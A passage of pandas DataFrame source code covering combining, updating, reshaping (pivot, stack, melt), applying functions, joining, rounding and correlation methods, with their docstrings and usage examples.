new_data = left._data.eval(func=func, other=right,
axes=[left.columns, self.index],
try_cast=try_cast)
return self._constructor(new_data)
def _combine_const(self, other, func, errors='raise', try_cast=True):
new_data = self._data.eval(func=func, other=other,
errors=errors,
try_cast=try_cast)
return self._constructor(new_data)
def _compare_frame_evaluate(self, other, func, str_rep, try_cast=True):
import pandas.core.computation.expressions as expressions
# unique
if self.columns.is_unique:
def _compare(a, b):
return {col: func(a[col], b[col]) for col in a.columns}
new_data = expressions.evaluate(_compare, str_rep, self, other)
return self._constructor(data=new_data, index=self.index,
columns=self.columns, copy=False)
# non-unique
else:
def _compare(a, b):
return {i: func(a.iloc[:, i], b.iloc[:, i])
for i, col in enumerate(a.columns)}
new_data = expressions.evaluate(_compare, str_rep, self, other)
result = self._constructor(data=new_data, index=self.index,
copy=False)
result.columns = self.columns
return result
def _compare_frame(self, other, func, str_rep, try_cast=True):
if not self._indexed_same(other):
raise ValueError('Can only compare identically-labeled '
'DataFrame objects')
return self._compare_frame_evaluate(other, func, str_rep,
try_cast=try_cast)
def _flex_compare_frame(self, other, func, str_rep, level, try_cast=True):
if not self._indexed_same(other):
self, other = self.align(other, 'outer', level=level, copy=False)
return self._compare_frame_evaluate(other, func, str_rep,
try_cast=try_cast)
def combine(self, other, func, fill_value=None, overwrite=True):
"""
Add two DataFrame objects and do not propagate NaN values, so if for a
(column, time) one frame is missing a value, it will default to the
other frame's value (which might be NaN as well)
Parameters
----------
other : DataFrame
func : function
Function that takes two series as inputs and return a Series or a
scalar
fill_value : scalar value
overwrite : boolean, default True
If True then overwrite values for common keys in the calling frame
Returns
-------
result : DataFrame
Examples
--------
>>> df1 = DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, lambda s1, s2: s1 if s1.sum() < s2.sum() else s2)
A B
0 0 3
1 0 3
See Also
--------
DataFrame.combine_first : Combine two DataFrame objects and default to
non-null values in frame calling the method
"""
other_idxlen = len(other.index) # save for compare
this, other = self.align(other, copy=False)
new_index = this.index
if other.empty and len(new_index) == len(self.index):
return self.copy()
if self.empty and len(other) == other_idxlen:
return other.copy()
# sorts if possible
new_columns = this.columns.union(other.columns)
do_fill = fill_value is not None
result = {}
for col in new_columns:
series = this[col]
otherSeries = other[col]
this_dtype = series.dtype
other_dtype = otherSeries.dtype
this_mask = isna(series)
other_mask = isna(otherSeries)
# don't overwrite columns unecessarily
# DO propagate if this column is not in the intersection
if not overwrite and other_mask.all():
result[col] = this[col].copy()
continue
if do_fill:
series = series.copy()
otherSeries = otherSeries.copy()
series[this_mask] = fill_value
otherSeries[other_mask] = fill_value
# if we have different dtypes, possibily promote
new_dtype = this_dtype
if not is_dtype_equal(this_dtype, other_dtype):
new_dtype = find_common_type([this_dtype, other_dtype])
if not is_dtype_equal(this_dtype, new_dtype):
series = series.astype(new_dtype)
if not is_dtype_equal(other_dtype, new_dtype):
otherSeries = otherSeries.astype(new_dtype)
# see if we need to be represented as i8 (datetimelike)
# try to keep us at this dtype
needs_i8_conversion_i = needs_i8_conversion(new_dtype)
if needs_i8_conversion_i:
arr = func(series, otherSeries, True)
else:
arr = func(series, otherSeries)
if do_fill:
arr = _ensure_float(arr)
arr[this_mask & other_mask] = np.nan
# try to downcast back to the original dtype
if needs_i8_conversion_i:
# ToDo: This conversion should be handled in
# _maybe_cast_to_datetime but the change affects lot...
if is_datetime64tz_dtype(new_dtype):
arr = DatetimeIndex._simple_new(arr, tz=new_dtype.tz)
else:
arr = maybe_cast_to_datetime(arr, new_dtype)
else:
arr = maybe_downcast_to_dtype(arr, this_dtype)
result[col] = arr
# convert_objects just in case
return self._constructor(result, index=new_index,
columns=new_columns)._convert(datetime=True,
copy=False)
def combine_first(self, other):
"""
Combine two DataFrame objects and default to non-null values in frame
calling the method. Result index columns will be the union of the
respective indexes and columns
Parameters
----------
other : DataFrame
Returns
-------
combined : DataFrame
Examples
--------
df1's values prioritized, use values from df2 to fill holes:
>>> df1 = pd.DataFrame([[1, np.nan]])
>>> df2 = pd.DataFrame([[3, 4]])
>>> df1.combine_first(df2)
0 1
0 1 4.0
See Also
--------
DataFrame.combine : Perform series-wise operation on two DataFrames
using a given function
"""
import pandas.core.computation.expressions as expressions
def combiner(x, y, needs_i8_conversion=False):
x_values = x.values if hasattr(x, 'values') else x
y_values = y.values if hasattr(y, 'values') else y
if needs_i8_conversion:
mask = isna(x)
x_values = x_values.view('i8')
y_values = y_values.view('i8')
else:
mask = isna(x_values)
return expressions.where(mask, y_values, x_values)
return self.combine(other, combiner, overwrite=False)
def update(self, other, join='left', overwrite=True, filter_func=None,
raise_conflict=False):
"""
Modify DataFrame in place using non-NA values from passed
DataFrame. Aligns on indices
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
join : {'left'}, default 'left'
overwrite : boolean, default True
If True then overwrite values for common keys in the calling frame
filter_func : callable(1d-array) -> 1d-array<boolean>, default None
Can choose to replace values other than NA. Return True for values
that should be updated
raise_conflict : boolean
If True, will raise an error if the DataFrame and other both
contain data in the same place.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If ``other`` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != 'left': # pragma: no cover
raise NotImplementedError("Only left join is supported")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
for col in self.columns:
this = self[col].values
that = other[col].values
if filter_func is not None:
with np.errstate(all='ignore'):
mask = ~filter_func(this) | isna(that)
else:
if raise_conflict:
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Misc methods
def _get_valid_indices(self):
is_valid = self.count(1) > 0
return self.index[is_valid]
@Appender(_shared_docs['valid_index'] % {
'position': 'first', 'klass': 'DataFrame'})
def first_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[0] if len(valid_indices) else None
@Appender(_shared_docs['valid_index'] % {
'position': 'last', 'klass': 'DataFrame'})
def last_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[-1] if len(valid_indices) else None
# ----------------------------------------------------------------------
# Data reshaping
def pivot(self, index=None, columns=None, values=None):
"""
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from index / columns to form axes of the resulting
DataFrame.
Parameters
----------
index : string or object, optional
Column name to use to make new frame's index. If None, uses
existing index.
columns : string or object
Column name to use to make new frame's columns
values : string or object, optional
Column name to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns
Returns
-------
pivoted : DataFrame
See also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair
DataFrame.unstack : pivot based on the index values instead of a
column
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods
Examples
--------
>>> df = pd.DataFrame({'foo': ['one','one','one','two','two','two'],
'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
'baz': [1, 2, 3, 4, 5, 6]})
>>> df
foo bar baz
0 one A 1
1 one B 2
2 one C 3
3 two A 4
4 two B 5
5 two C 6
>>> df.pivot(index='foo', columns='bar', values='baz')
A B C
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
A B C
one 1 2 3
two 4 5 6
"""
from pandas.core.reshape.reshape import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs['pivot_table'] = """
Create a spreadsheet-style pivot table as a DataFrame. The levels in
the pivot table will be stored in MultiIndex objects (hierarchical
indexes) on the index and columns of the result DataFrame
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
it is being used as the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
it is being used as the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
hierarchical columns whose top level are the function names
(inferred from the function objects themselves)
If dict is passed, the key is column to aggregate and value
is function or list of functions
fill_value : scalar, default None
Value to replace missing values with
margins : boolean, default False
Add all row / columns (e.g. for subtotal / grand totals)
dropna : boolean, default True
Do not include columns whose entries are all NaN
margins_name : string, default 'All'
Name of the row / column that will contain the totals
when margins is True.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7]})
>>> df
A B C D
0 foo one small 1
1 foo one large 2
2 foo one large 2
3 foo two small 3
4 foo two small 3
5 bar one large 4
6 bar one small 5
7 bar two small 6
8 bar two large 7
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max median min
A C
bar large 5.500000 16 14.5 13
small 5.500000 15 14.5 14
foo large 2.000000 10 9.5 9
small 2.333333 12 11.0 8
Returns
-------
table : DataFrame
See also
--------
DataFrame.pivot : pivot without aggregation that can handle
non-numeric data
"""
@Substitution('')
@Appender(_shared_docs['pivot_table'])
def pivot_table(self, values=None, index=None, columns=None,
aggfunc='mean', fill_value=None, margins=False,
dropna=True, margins_name='All'):
from pandas.core.reshape.pivot import pivot_table
return pivot_table(self, values=values, index=index, columns=columns,
aggfunc=aggfunc, fill_value=fill_value,
margins=margins, dropna=dropna,
margins_name=margins_name)
def stack(self, level=-1, dropna=True):
"""
Pivot a level of the (possibly hierarchical) column labels, returning a
DataFrame (or Series in the case of an object with a single level of
column labels) having a hierarchical index with a new inner-most level
of row labels.
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default last level
Level(s) to stack, can pass level name
dropna : boolean, default True
Whether to drop rows in the resulting Frame/Series with no valid
values
Examples
----------
>>> s
a b
one 1. 2.
two 3. 4.
>>> s.stack()
one a 1
b 2
two a 3
b 4
Returns
-------
stacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels, returning
a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels. If the index is not a MultiIndex,
the output will be a Series (the analogue of stack when the columns are
not a MultiIndex).
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name
fill_value : replace NaN with this value if the unstack produces
missing values
.. versionadded:: 0.18.0
See also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
Returns
-------
unstacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
_shared_docs['melt'] = ("""
"Unpivots" a DataFrame from wide format to long format, optionally
leaving identifier variables set.
This function is useful to massage a DataFrame into a format where one
or more columns are identifier variables (`id_vars`), while all other
columns, considered measured variables (`value_vars`), are "unpivoted" to
the row axis, leaving just two non-identifier columns, 'variable' and
'value'.
%(versionadded)s
Parameters
----------
frame : DataFrame
id_vars : tuple, list, or ndarray, optional
Column(s) to use as identifier variables.
value_vars : tuple, list, or ndarray, optional
Column(s) to unpivot. If not specified, uses all columns that
are not set as `id_vars`.
var_name : scalar
Name to use for the 'variable' column. If None it uses
``frame.columns.name`` or 'variable'.
value_name : scalar, default 'value'
Name to use for the 'value' column.
col_level : int or string, optional
If columns are a MultiIndex then use this level to melt.
See also
--------
%(other)s
pivot_table
DataFrame.pivot
Examples
--------
>>> import pandas as pd
>>> df = pd.DataFrame({'A': {0: 'a', 1: 'b', 2: 'c'},
... 'B': {0: 1, 1: 3, 2: 5},
... 'C': {0: 2, 1: 4, 2: 6}})
>>> df
A B C
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)sid_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=['A'], value_vars=['B', 'C'])
A variable value
0 a B 1
1 b B 3
2 c B 5
3 a C 2
4 b C 4
5 c C 6
The names of 'variable' and 'value' columns can be customized:
>>> %(caller)sid_vars=['A'], value_vars=['B'],
... var_name='myVarname', value_name='myValname')
A myVarname myValname
0 a B 1
1 b B 3
2 c B 5
If you have multi-index columns:
>>> df.columns = [list('ABC'), list('DEF')]
>>> df
A B C
D E F
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)scol_level=0, id_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=[('A', 'D')], value_vars=[('B', 'E')])
(A, D) variable_0 variable_1 value
0 a B E 1
1 b B E 3
2 c B E 5
""")
@Appender(_shared_docs['melt'] %
dict(caller='df.melt(',
versionadded='.. versionadded:: 0.20.0\n',
other='melt'))
def melt(self, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
from pandas.core.reshape.melt import melt
return melt(self, id_vars=id_vars, value_vars=value_vars,
var_name=var_name, value_name=value_name,
col_level=col_level)
# ----------------------------------------------------------------------
# Time series-related
def diff(self, periods=1, axis=0):
"""
1st discrete difference of object
Parameters
----------
periods : int, default 1
Periods to shift for forming difference
axis : {0 or 'index', 1 or 'columns'}, default 0
Take difference over rows (0) or columns (1).
.. versionadded:: 0.16.1
Returns
-------
diffed : DataFrame
"""
bm_axis = self._get_block_manager_axis(axis)
new_data = self._data.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
# TODO: _shallow_copy(subset)?
return self[key]
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'],
... index=pd.date_range('1/1/2000', periods=10))
>>> df.iloc[3:7] = np.nan
Aggregate these functions across all columns
>>> df.agg(['sum', 'min'])
A B C
sum -0.182253 -0.614014 -2.909534
min -1.916563 -1.460076 -1.568297
Different aggregations per column
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 1.514318
min -1.916563 -1.460076
sum -0.182253 NaN
See also
--------
pandas.DataFrame.apply
pandas.DataFrame.transform
pandas.DataFrame.groupby.aggregate
pandas.DataFrame.resample.aggregate
pandas.DataFrame.rolling.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='.. versionadded:: 0.20.0',
**_shared_doc_kwargs))
def aggregate(self, func, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
# TODO: flipped axis
result = None
if axis == 0:
try:
result, how = self._aggregate(func, axis=0, *args, **kwargs)
except TypeError:
pass
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
return result
agg = aggregate
def apply(self, func, axis=0, broadcast=False, raw=False, reduce=None,
args=(), **kwds):
"""Applies function along input axis of DataFrame.
Objects passed to functions are Series objects having index
either the DataFrame's index (axis=0) or the columns (axis=1).
Return type depends on whether passed function aggregates, or the
reduce argument if the DataFrame is empty.
Parameters
----------
func : function
Function to apply to each column/row
axis : {0 or 'index', 1 or 'columns'}, default 0
* 0 or 'index': apply function to each column
* 1 or 'columns': apply function to each row
broadcast : boolean, default False
For aggregation functions, return object of same size with values
propagated
raw : boolean, default False
If False, convert each row or column into a Series. If raw=True the
passed function will receive ndarray objects instead. If you are
just applying a NumPy reduction function this will achieve much
better performance
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
args : tuple
Positional arguments to pass to function in addition to the
array/series
Additional keyword arguments will be passed as keywords to the function
Notes
-----
In the current implementation apply calls func twice on the
first column/row to decide whether it can take a fast or slow
code path. This can lead to unexpected behavior if func has
side-effects, as they will take effect twice for the first
column/row.
Examples
--------
>>> df.apply(numpy.sqrt) # returns DataFrame
>>> df.apply(numpy.sum, axis=0) # equiv to df.sum(0)
>>> df.apply(numpy.sum, axis=1) # equiv to df.sum(1)
See also
--------
DataFrame.applymap: For elementwise operations
DataFrame.aggregate: only perform aggregating type operations
DataFrame.transform: only perform transformating type operations
Returns
-------
applied : Series or DataFrame
"""
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
broadcast=broadcast,
raw=raw,
reduce=reduce,
args=args, **kwds)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Examples
--------
>>> df = pd.DataFrame(np.random.randn(3, 3))
>>> df
0 1 2
0 -0.029638 1.081563 1.280300
1 0.647747 0.831136 -1.549481
2 0.513416 -0.884417 0.195343
>>> df = df.applymap(lambda x: '%.2f' % x)
>>> df
0 1 2
0 -0.03 1.08 1.28
1 0.65 0.83 -1.55
2 0.51 -0.88 0.20
Returns
-------
applied : DataFrame
See also
--------
DataFrame.apply : For operations on rows/columns
"""
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func)
return lib.map_infer(x.astype(object).values, func)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(self, other, ignore_index=False, verify_integrity=False):
"""
Append rows of `other` to the end of this frame, returning a new
object. Columns not in this frame are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : boolean, default False
If True, do not use the index labels.
verify_integrity : boolean, default False
If True, raise ValueError on creating index with duplicates.
Returns
-------
appended : DataFrame
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
See also
--------
pandas.concat : General function to concatenate DataFrame, Series
or Panel objects
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError('Can only append a Series if ignore_index=True'
' or if the Series has a name')
if other.name is None:
index = None
else:
# other must have the same index name as self, otherwise
# index name will be reset
index = Index([other.name], name=self.index.name)
combined_columns = self.columns.tolist() + self.columns.union(
other.index).difference(self.columns).tolist()
other = other.reindex(combined_columns, copy=False)
other = DataFrame(other.values.reshape((1, len(other))),
index=index,
columns=combined_columns)
other = other._convert(datetime=True, timedelta=True)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list) and not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.loc[:, self.columns]
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self] + other
else:
to_concat = [self, other]
return concat(to_concat, ignore_index=ignore_index,
verify_integrity=verify_integrity)
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
"""
Join columns with other DataFrame either on index or on a key
column. Efficiently Join multiple DataFrame objects by index at once by
passing a list.
Parameters
----------
other : DataFrame, Series with name field set, or list of DataFrame
Index should be similar to one of the columns in this one. If a
Series is passed, its name attribute must be set, and that will be
used as the column name in the resulting joined DataFrame
on : name, tuple/list of names, or array-like
Column or index level name(s) in the caller to join on the index
in `other`, otherwise joins index-on-index. If multiple
values given, the `other` DataFrame must have a MultiIndex. Can
pass an array as the join key if it is not already contained in
the calling DataFrame. Like an Excel VLOOKUP operation
how : {'left', 'right', 'outer', 'inner'}, default: 'left'
How to handle the operation of the two objects.
* left: use calling frame's index (or column if on is specified)
* right: use other frame's index
* outer: form union of calling frame's index (or column if on is
specified) with other frame's index, and sort it
lexicographically
* inner: form intersection of calling frame's index (or column if
on is specified) with other frame's index, preserving the order
of the calling's one
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
sort : boolean, default False
Order result DataFrame lexicographically by the join key. If False,
the order of the join key depends on the join type (how keyword)
Notes
-----
on, lsuffix, and rsuffix options are not supported when passing a list
of DataFrame objects
Support for specifying index levels as the `on` parameter was added
in version 0.23.0
Examples
--------
>>> caller = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
... 'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
>>> caller
A key
0 A0 K0
1 A1 K1
2 A2 K2
3 A3 K3
4 A4 K4
5 A5 K5
>>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
... 'B': ['B0', 'B1', 'B2']})
>>> other
B key
0 B0 K0
1 B1 K1
2 B2 K2
Join DataFrames using their indexes.
>>> caller.join(other, lsuffix='_caller', rsuffix='_other')
>>> A key_caller B key_other
0 A0 K0 B0 K0
1 A1 K1 B1 K1
2 A2 K2 B2 K2
3 A3 K3 NaN NaN
4 A4 K4 NaN NaN
5 A5 K5 NaN NaN
If we want to join using the key columns, we need to set key to be
the index in both caller and other. The joined DataFrame will have
key as its index.
>>> caller.set_index('key').join(other.set_index('key'))
>>> A B
key
K0 A0 B0
K1 A1 B1
K2 A2 B2
K3 A3 NaN
K4 A4 NaN
K5 A5 NaN
Another option to join using the key columns is to use the on
parameter. DataFrame.join always uses other's index but we can use any
column in the caller. This method preserves the original caller's
index in the result.
>>> caller.join(other.set_index('key'), on='key')
>>> A key B
0 A0 K0 B0
1 A1 K1 B1
2 A2 K2 B2
3 A3 K3 NaN
4 A4 K4 NaN
5 A5 K5 NaN
See also
--------
DataFrame.merge : For column(s)-on-columns(s) operations
Returns
-------
joined : DataFrame
"""
# For SparseDataFrame's benefit
return self._join_compat(other, on=on, how=how, lsuffix=lsuffix,
rsuffix=rsuffix, sort=sort)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
from pandas.core.reshape.merge import merge
from pandas.core.reshape.concat import concat
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = DataFrame({other.name: other})
if isinstance(other, DataFrame):
return merge(self, other, left_on=on, how=how,
left_index=on is None, right_index=True,
suffixes=(lsuffix, rsuffix), sort=sort)
else:
if on is not None:
raise ValueError('Joining multiple DataFrames only supported'
' for joining on index')
# join indexes only using concat
if how == 'left':
how = 'outer'
join_axes = [self.index]
else:
join_axes = None
frames = [self] + list(other)
can_concat = all(df.index.is_unique for df in frames)
if can_concat:
return concat(frames, axis=1, join=how, join_axes=join_axes,
verify_integrity=True)
joined = frames[0]
for frame in frames[1:]:
joined = merge(joined, frame, how=how, left_index=True,
right_index=True)
return joined
@Substitution('')
@Appender(_merge_doc, indents=2)
def merge(self, right, how='inner', on=None, left_on=None, right_on=None,
left_index=False, right_index=False, sort=False,
suffixes=('_x', '_y'), copy=True, indicator=False,
validate=None):
from pandas.core.reshape.merge import merge
return merge(self, right, how=how, on=on, left_on=left_on,
right_on=right_on, left_index=left_index,
right_index=right_index, sort=sort, suffixes=suffixes,
copy=copy, indicator=indicator, validate=validate)
def round(self, decimals=0, *args, **kwargs):
"""
Round a DataFrame to a variable number of decimal places.
Parameters
----------
decimals : int, dict, Series
Number of decimal places to round each column to. If an int is
given, round each column to the same number of places.
Otherwise dict and Series round to variable numbers of places.
Column names should be in the keys if `decimals` is a
dict-like, or in the index if `decimals` is a Series. Any
columns not included in `decimals` will be left as is. Elements
of `decimals` which are not columns of the input will be
ignored.
Examples
--------
>>> df = pd.DataFrame(np.random.random([3, 3]),
... columns=['A', 'B', 'C'], index=['first', 'second', 'third'])
>>> df
A B C
first 0.028208 0.992815 0.173891
second 0.038683 0.645646 0.577595
third 0.877076 0.149370 0.491027
>>> df.round(2)
A B C
first 0.03 0.99 0.17
second 0.04 0.65 0.58
third 0.88 0.15 0.49
>>> df.round({'A': 1, 'C': 2})
A B C
first 0.0 0.992815 0.17
second 0.0 0.645646 0.58
third 0.9 0.149370 0.49
>>> decimals = pd.Series([1, 0, 2], index=['A', 'B', 'C'])
>>> df.round(decimals)
A B C
first 0.0 1 0.17
second 0.0 1 0.58
third 0.9 0 0.49
Returns
-------
DataFrame object
See Also
--------
numpy.around
Series.round
"""
from pandas.core.reshape.concat import concat
def _dict_round(df, decimals):
for col, vals in df.iteritems():
try:
yield _series_round(vals, decimals[col])
except KeyError:
yield vals
def _series_round(s, decimals):
if is_integer_dtype(s) or is_float_dtype(s):
return s.round(decimals)
return s
nv.validate_round(args, kwargs)
if isinstance(decimals, (dict, Series)):
if isinstance(decimals, Series):
if not decimals.index.is_unique:
raise ValueError("Index of decimals must be unique")
new_cols = [col for col in _dict_round(self, decimals)]
elif is_integer(decimals):
# Dispatch to Series.round
new_cols = [_series_round(v, decimals)
for _, v in self.iteritems()]
else:
raise TypeError("decimals must be an integer, a dict-like or a "
"Series")
if len(new_cols) > 0:
return self._constructor(concat(new_cols, axis=1),
index=self.index,
columns=self.columns)
else:
return self
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method='pearson', min_periods=1):
"""
Compute pairwise correlation of columns, excluding NA/null values
Parameters
----------
method : {'pearson', 'kendall', 'spearman'}
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result. Currently only available for pearson
and spearman correlation
Returns
-------
y : DataFrame
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if method == 'pearson':
correl = libalgos.nancorr(_ensure_float64(mat), minp=min_periods)
elif method == 'spearman':
correl = libalgos.nancorr_spearman(_ensure_float64(mat),
minp=min_periods)
else:
if min_periods is None:
min_periods = 1
mat = _ensure_float64(mat).T
corrf = nanops.get_corr_func(method)
K = len(cols)
correl = np.empty((K, K), dtype=float)
mask = np.isfinite(mat)
for i, ac in enumerate(mat):
for j, bc in enumerate(mat):
if i > j:
continue
valid = mask[i] & mask[j]
if valid.sum() < min_periods:
c = np.nan
elif i == j:
c = 1.
elif not valid.all():
c = corrf(ac[valid], bc[valid])
else:
c = corrf(ac, bc)
correl[i, j] = c
correl[j, i] = c
